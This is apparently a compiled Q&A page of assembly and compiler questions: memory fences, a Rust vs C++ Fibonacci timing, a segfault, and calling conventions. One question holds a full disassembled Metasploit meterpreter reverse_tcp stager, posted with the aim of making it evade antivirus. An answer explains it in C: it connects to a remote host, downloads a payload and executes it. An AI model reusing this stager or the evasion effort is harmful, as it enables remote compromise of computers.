Gcc generates always mfence. Why? - c++11

I am wondering why GCC 6.2 generates following assembly output:
main:
push rbp
mov rbp, rsp
mov DWORD PTR [rbp-12], 0
mfence
mov DWORD PTR [rbp-8], 3
mfence
mov DWORD PTR [rbp-4], 2
mfence
mov eax, 0
pop rbp
ret
from source:
#include <atomic>
int main(){
std::atomic_thread_fence(std::memory_order_relaxed); // why mfence instead of `nothing`?
std::atomic_thread_fence(std::memory_order_release); // why mfence instead of sfence?
std::atomic_thread_fence(std::memory_order_acquire); // why mfence instead of lfence?
return 0;
}
Especially:
Why mfence instead of nothing?
Why mfence instead of sfence?
Why mfence instead of lfence?

Related

Performance difference Rust and C++

I am currently learning Rust, and as a first exercise I wanted to implement a function that computes the nth fibonacci number:
fn main() {
for i in 0..48 {
println!("{}: {}", i, fibonacci(i));
}
}
fn fibonacci(n: u32) -> u32 {
match n {
0 => 0,
1 => 1,
_ => fibonacci(n - 1) + fibonacci(n - 2),
}
}
I run it as:
$ time cargo run --release
real 0m15.380s
user 0m15.362s
sys 0m0.014s
As an exercise, I also implemented the same algorithm in C++. I was expecting a similar performance, but the C++ code runs in 80% of the time:
#include<iostream>
unsigned int fibonacci(unsigned int n);
int main (int argc, char* argv[]) {
for(unsigned int i = 0; i < 48; ++i) {
std::cout << i << ": " << fibonacci(i) << '\n';
}
return 0;
}
unsigned int fibonacci(unsigned int n) {
if(n == 0) {
return 0;
} else if (n == 1) {
return 1;
} else {
return fibonacci(n - 1) + fibonacci(n - 2);
}
}
Compiled as:
$ g++ test.cpp -o test.exe -O2
And running:
$ time ./test.exe
real 0m12.127s
user 0m12.124s
sys 0m0.000s
Why do I see such a difference in performance? I am not interested in calculating the fibonacci faster in Rust (with a different algorithm); I am only interested on where the difference comes from. This is just an exercise in my progress as I learn Rust.
TL;DR: It's not Rust vs C++, it's LLVM (Clang) vs GCC.
Different optimizers optimize the code differently, and in this case GCC produces larger but faster code.
This can be verified using godbolt.
Here is Rust, compiled with both GCC (via rustgcc-master):
example::fibonacci:
push r15
push r14
push r13
push r12
push rbp
xor ebp, ebp
push rbx
mov ebx, edi
sub rsp, 24
.L2:
test ebx, ebx
je .L1
cmp ebx, 1
je .L4
lea r12d, -1[rbx]
xor r13d, r13d
.L19:
cmp r12d, 1
je .L6
lea r14d, -1[r12]
xor r15d, r15d
.L16:
cmp r14d, 1
je .L8
lea edx, -1[r14]
xor ecx, ecx
.L13:
cmp edx, 1
je .L10
lea edi, -1[rdx]
mov DWORD PTR 12[rsp], ecx
mov DWORD PTR 8[rsp], edx
call example::fibonacci.localalias
mov ecx, DWORD PTR 12[rsp]
mov edx, DWORD PTR 8[rsp]
add ecx, eax
sub edx, 2
jne .L13
.L14:
add r15d, ecx
sub r14d, 2
je .L17
jmp .L16
.L4:
add ebp, 1
.L1:
add rsp, 24
mov eax, ebp
pop rbx
pop rbp
pop r12
pop r13
pop r14
pop r15
ret
.L6:
add r13d, 1
.L20:
sub ebx, 2
add ebp, r13d
jmp .L2
.L8:
add r15d, 1
.L17:
add r13d, r15d
sub r12d, 2
je .L20
jmp .L19
.L10:
add ecx, 1
jmp .L14
And with LLVM (via rustc):
example::fibonacci:
push rbp
push r14
push rbx
mov ebx, edi
xor ebp, ebp
mov r14, qword ptr [rip + example::fibonacci#GOTPCREL]
cmp ebx, 2
jb .LBB0_3
.LBB0_2:
lea edi, [rbx - 1]
call r14
add ebp, eax
add ebx, -2
cmp ebx, 2
jae .LBB0_2
.LBB0_3:
add ebx, ebp
mov eax, ebx
pop rbx
pop r14
pop rbp
ret
We can see that LLVM produces a naive version -- calling the function in each iteration of the loop -- while GCC partially unrolls the recursion by inlining some calls. This results in a smaller number of calls in the case of GCC, and at about 5ns of overhead per function call, it's significant enough.
We can do the same exercise with the C++ version using LLVM via Clang and GCC and note that the result is pretty much similar.
So, as announced, it's a LLVM vs GCC difference, not a language one.
Incidentally, the fact that optimizers may produce such widely different results is a reason why I am quite excited at the progress of the rustc_codegen_gcc initiative (dubbed rustgcc-master on godbolt) which aims at pluging a GCC backend into the rustc frontend: once complete anyone will be able to switch to the better optimizer for their own workload.

Segmentation fault after function call in x86 assembly

I'm currently writing a compiler and I have created some tests and only one of them fails with Segmentation fault (core dumped) as error message.
This is the code that gets compiled
function main(): int {
var f: int = 10;
return func(f) - func(f / 2);
}
function func(a: int): int {
return a;
}
And this is the generated assembly code (it's not really optimized as you can see)
section .text
global _start
_start:
call function_main
mov rdi, rax
mov rax, 60
syscall
global function_main
function_main:
push rbp
mov rbp, rsp
sub rsp, 4
mov rax, 10
mov DWORD[rbp-0], eax
mov eax, DWORD[rbp-0]
mov rdi, rax
call function_func
push rax
mov eax, DWORD[rbp-0]
mov rbx, 2
idiv rbx
mov rdi, rax
call function_func
mov rbx, rax
pop rax
sub rax, rbx
mov rsp, rbp
pop rbp
ret
global function_func
function_func:
push rbp
mov rbp, rsp
sub rsp, 4
mov DWORD[rbp-0], edi
mov eax, DWORD[rbp-0]
mov rsp, rbp
pop rbp
ret
The assembly file is compiled with nasm -f elf64 ./test9.lv.asm -o ./test9.lv.asm.o and ld -g ./test9.lv.asm.o a.out
I've used gdb to debug the binary file and it seems like the program receives the SIGSEGV signal right after func(f) returns the first time.
But now I don't know why this is happening in this case.

X64 ASSEMBLY - Cannot run compiled and linked raw shellcode in Windows

After using metasploit's windows/x64/meterpreter/reverse_tcp shellcode on my windows 10 machine (with AVs turned off), I decided to try to create a hand-made polymorphic, null-free and custom-encoded version of the same shellcode (with the hope of evading my AVs).
To test my work flow, I produced a raw output of the shellcode using:
msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -a x64 --platform windows LHOST='my IP address' | ndisasm -b 64 -
global _start
section .text
_start:
cld
and rsp,byte -0x10
call first_call ;dword 0xd6
push r9
push r8
push rdx
push rcx
push rsi
xor rdx,rdx
mov rdx,[gs:rdx+0x60]
mov rdx,[rdx+0x18]
mov rdx,[rdx+0x20]
fifth_jmp:
mov rsi,[rdx+0x50]
movzx rcx,word [rdx+0x4a]
xor r9,r9
xor rax,rax
lodsb
cmp al,0x61
jl 0x37
sub al,0x20
ror r9d,0xd
add r9d,eax
loop 0x2d
push rdx
push r9
mov rdx,[rdx+0x20]
mov eax,[rdx+0x3c]
add rax,rdx
cmp word [rax+0x18],0x20b
jnz first_jmp ;dword 0xcb
mov eax,[rax+0x88]
test rax,rax
jz first_jmp ;0xcb
add rax,rdx
push rax
mov ecx,[rax+0x18]
mov r8d,[rax+0x20]
add r8,rdx
fourth_jmp:
jrcxz second_jmp ;0xca
dec rcx
mov esi,[r8+rcx*4]
add rsi,rdx
xor r9,r9
third_jmp:
xor rax,rax
lodsb
ror r9d,0xd
add r9d,eax
cmp al,ah
jnz third_jmp
add r9,[rsp+0x8]
cmp r9d,r10d
jnz fourth_jmp ;0x72
pop rax
mov r8d,[rax+0x24]
add r8,rdx
mov cx,[r8+rcx*2]
mov r8d,[rax+0x1c]
add r8,rdx
mov eax,[r8+rcx*4]
add rax,rdx
pop r8
pop r8
pop rsi
pop rcx
pop rdx
pop r8
pop r9
pop r10
sub rsp,byte +0x20
push r10
jmp rax
second_jmp:
pop rax
first_jmp:
pop r9
pop rdx
mov rdx,[rdx]
jmp dword fifth_jmp ;0x21
first_call:
pop rbp
mov r14,0x32335f327377
push r14
mov r14,rsp
sub rsp,0x1a0
mov r13,rsp
mov r12,0x6900a8c05c110002
push r12
mov r12,rsp
mov rcx,r14
mov r10d,0x726774c
call rbp
mov rdx,r13
push dword 0x101
pop rcx
mov r10d,0x6b8029
call rbp
push byte +0x5
pop r14
ninth_jmp:
push rax
push rax
xor r9,r9
xor r8,r8
inc rax
mov rdx,rax
inc rax
mov rcx,rax
mov r10d,0xe0df0fea
call rbp
mov rdi,rax
sixth_jmp:
push byte +0x10
pop r8
mov rdx,r12
mov rcx,rdi
mov r10d,0x6174a599
call rbp
test eax,eax
jz 0x15e
dec r14
jnz sixth_jmp ;0x13e
call second_call ;dword 0x1f1
sub rsp,byte +0x10
mov rdx,rsp
xor r9,r9
push byte +0x4
pop r8
mov rcx,rdi
mov r10d,0x5fc8d902
call rbp
cmp eax,byte +0x0
jng seventh_jmp ;0x1d1
add rsp,byte +0x20
pop rsi
mov esi,esi
push byte +0x40
pop r9
push dword 0x1000
pop r8
mov rdx,rsi
xor rcx,rcx
mov r10d,0xe553a458
call rbp
mov rbx,rax
mov r15,rax
tenth_jmp:
xor r9,r9
mov r8,rsi
mov rdx,rbx
mov rcx,rdi
mov r10d,0x5fc8d902
call rbp
cmp eax,byte +0x0
jnl eighth_jmp ;0x1e3
pop rax
push r15
pop rcx
push dword 0x4000
pop r8
push byte +0x0
pop rdx
mov r10d,0x300f2f0b
call rbp
seventh_jmp:
push rdi
pop rcx
mov r10d,0x614d6e75
call rbp
dec r14
jmp ninth_jmp ;0x11f
eighth_jmp:
add rbx,rax
sub rsi,rax
test rsi,rsi
jnz tenth_jmp ;0x1a2
jmp r15
second_call:
pop rax
push byte +0x0
pop rcx
mov r10,0x56a2b5f0
call rbp
Before making any changes to the ndisasm output (apart from modifying the call and jmp destinations from relative addresses to labels, see code above), I compiled and linked the output using:
nasm -f win64 -o meterpreter_reverse_tcp.o meterpreter_reverse_tcp.asm
/opt/mingw/x86_64-w64-mingw32/bin/ld -o meterpreter_reverse_tcp.exe meterpreter_reverse_tcp.o
But when I ran the .exe on my windows 10 machine, I got the following error:
Meterpreter_reverse_tcp.exe has stopped working. A problem caused the program to stop working correctly. Windows will close the program and notify you if a solution is available.
The output of the command 'file meterpreter_reverse_tcp.exe' is:
meterpreter_reverse_tcp.exe: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
What did I do wrong ?
your shell code if convert it to c/c++ is next:
LoadLibraryA("ws2_32");
WSADATA wd;
WSAStartup(MAKEWORD(1,1), &wd);
loop:
SOCKET s = WSASocketA(AF_INET, SOCK_STREAM, 0, 0, 0, 0);
SOCKADDR_IN sa = { AF_INET, _byteswap_ushort(4444) };
sa.sin_addr.s_addr = IP(192, 168, 0, 105);
// try 5 times connect to 192.168.0.105
int n = 5;
do
{
if (connect(s, (sockaddr*)&sa, sizeof(SOCKADDR_IN)) == NOERROR)
{
// we connected
break;
}
} while (--n);
ExitProcess(0);// !! error in shellcode or special damaged ?
ULONG len;
// get the length of shellcode
if (0 < recv(s, (char*)&len, sizeof(len), 0))
{
// allocate buffer for shellcode
PVOID pv = VirtualAlloc(0, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
char* buf = (char*)pv;
// download shellcode in loop
do
{
if (0 > (n = recv(s, buf, len, 0)))
{
// download fail
// bug !!
// must be MEM_RELEASE for free memory, but used MEM_DECOMMIT in code.
VirtualFree(pv, 0, MEM_DECOMMIT);
closesocket(s);
goto loop;
}
} while (buf += n, len -= n);
// all shellcode downloaded
// call it
((FARPROC)pv)();
}
ExitProcess(0);
it i be say worked under debugger. if something not worked for you - debug it. especially put bp on jmp rax - the begin of shell code is function which search for exported api (by hash) and call it (jmp rax)

What is the reason for this x86 calling convention?

I was trying to reduce the clutter in my original question (below), but I am afraid that made it harder to follow. So here is the original source along with IDA's disassembly.
My question still is this: why does getStruct() pop the return argument and only the return argument off the stack? (It's calling ret 4 instead of ret for no arguments or ret 12 for all three arguments).
#include <iostream>
struct SomeStruct {
char m_buff[0x1000];
};
SomeStruct getStruct(uint32_t someArg1, uint32_t someArg2)
{
return SomeStruct();
}
int main(int argc, const char * argv[])
{
SomeStruct myLocalStruct = getStruct(0x20,0x30);
return 0;
}
; _DWORD __stdcall getStruct(unsigned int, unsigned int)
public getStruct(unsigned int, unsigned int)
getStruct(unsigned int, unsigned int) proc near ; CODE XREF: _main+4Dp
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_4]
mov edx, [ebp+arg_0]
mov [ebp+var_4], ecx
mov [ebp+var_8], eax
mov eax, esp
mov [eax], edx
mov dword ptr [eax+4], 1000h
call ___bzero
add esp, 18h
pop ebp
retn 4
getStruct(unsigned int, unsigned int) endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl main(int argc, const char **argv, const char **envp)
public _main
_main proc near
var_1020 = dword ptr -1020h
var_101C = dword ptr -101Ch
var_1018 = dword ptr -1018h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
argc = dword ptr 8
argv = dword ptr 0Ch
envp = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
sub esp, 1030h
mov eax, [ebp+argv]
mov ecx, [ebp+argc]
lea edx, [ebp+var_1018]
mov esi, 20h
mov edi, 30h
mov [ebp+var_C], 0
mov [ebp+var_10], ecx
mov [ebp+var_14], eax
mov [esp], edx ; ptr to destination
mov dword ptr [esp+4], 20h ; unsigned int
mov dword ptr [esp+8], 30h
mov [ebp+var_101C], esi
mov [ebp+var_1020], edi
call getStruct(uint,uint)
sub esp, 4
mov eax, 0
add esp, 1030h
pop esi
pop edi
pop ebp
retn
_main endp
Original question below:
I have some function with the following declaration:
SomeStruct getStruct(uint32_t someArg1, uint32_t someArg2);
getStruct is being called like this:
myLocalStruct = getStruct(someArg1,someArg2);
When compiling this using clang on x86 the calling code looks roughly like this:
lea esi, [ebp-myLocalStructOffset]
mov [esp], esi
mov [esp+4], someArg1
mov [esp+8], someArg2
call getStruct;
sub esp, 4;
So the caller is restoring its stack pointer after the call. Sure enough, the implementation of getStruct ends with a ret 4, effectively popping the structs pointer.
This looks like it is partially cdecl with the caller being responsible for the stack cleanup, and partially stdcall with the callee removing the arguments. I just cannot figure out what the reason is for this approach. Why not leave all the cleanup to the caller? Is there any benefit to this ?
It looks as if you forgot to quote the few lines of assembler above the part you quoted. I assume there is something like:
sub esp,12
somewhere above what you quoted. The calling convention looks like pure stdcall, and the return value is in reality passed as a hidden pointer argument, i.e. the code is in fact compiled as if you had declared:
void __stdcall getStruct(SomeStruct *returnValue, uint32_t someArg1, uint32_t someArg2);

gcc cdecl calling convention

test a cdecl calling convention,but it's a little confusion about this:
original C code:
int __attribute__((cdecl)) add(int a,int b)
{
int i;
i = a+b;
return i;
}
void __attribute__((cdecl)) print(int i, ...)
{
int j,a,b;
a = 2;
b = 3;
j = add(a,b);
}
void __attribute__((cdecl)) main(void)
{
print(2,3);
}
void __attribute__((cdecl)) main(void)
{
print(2,3);
}
compile code with this:
gcc test3.c -o test3 -g -mrtd
the corresponding asm like that:
(gdb) disassemble print
Dump of assembler code for function print:
0x080483cb <+0>: push ebp
0x080483cc <+1>: mov ebp,esp
0x080483ce <+3>: sub esp,0x18
0x080483d1 <+6>: mov DWORD PTR [ebp-0x8],0x2
0x080483d8 <+13>:mov DWORD PTR [ebp-0xc],0x3
0x080483df <+20>:mov eax,DWORD PTR [ebp-0xc]
0x080483e2 <+23>:mov DWORD PTR [esp+0x4],eax
0x080483e6 <+27>:mov eax,DWORD PTR [ebp-0x8]
0x080483e9 <+30>:mov DWORD PTR [esp],eax
0x080483ec <+33>:call 0x80483b4 <add>
0x080483f1 <+38>:mov DWORD PTR [ebp-0x4],eax
0x080483f4 <+41>:leave
0x080483f5 <+42>:ret
(gdb) disassemble add
Dump of assembler code for function add:
0x080483b4 <+0>: push ebp
0x080483b5 <+1>: mov ebp,esp
0x080483b7 <+3>: sub esp,0x10
0x080483ba <+6>: mov eax,DWORD PTR [ebp+0xc]
0x080483bd <+9>: mov edx,DWORD PTR [ebp+0x8]
0x080483c0 <+12>:lea eax,[edx+eax*1]
0x080483c3 <+15>:mov DWORD PTR [ebp-0x4],eax
0x080483c6 <+18>:mov eax,DWORD PTR [ebp-0x4]
0x080483c9 <+21>:leave
0x080483ca <+22>:ret
(gdb) disassemble main
Dump of assembler code for function main:
0x080483f6 <+0>: push ebp
0x080483f7 <+1>: mov ebp,esp
0x080483f9 <+3>: sub esp,0x8
0x080483fc <+6>: mov DWORD PTR [esp+0x4],0x3
0x08048404 <+14>:mov DWORD PTR [esp],0x2
0x0804840b <+21>:call 0x80483cb <print>
0x08048410 <+26>:leave
0x08048411 <+27>:ret
the cdecl convention don't add some instruction like:
add esp 8 or other similar instructions after the calling function.
why this? Thank you.
The code uses the leave instruction, which restores the stack frame. Therefore there is no need to adjust the stack pointer separately.

Resources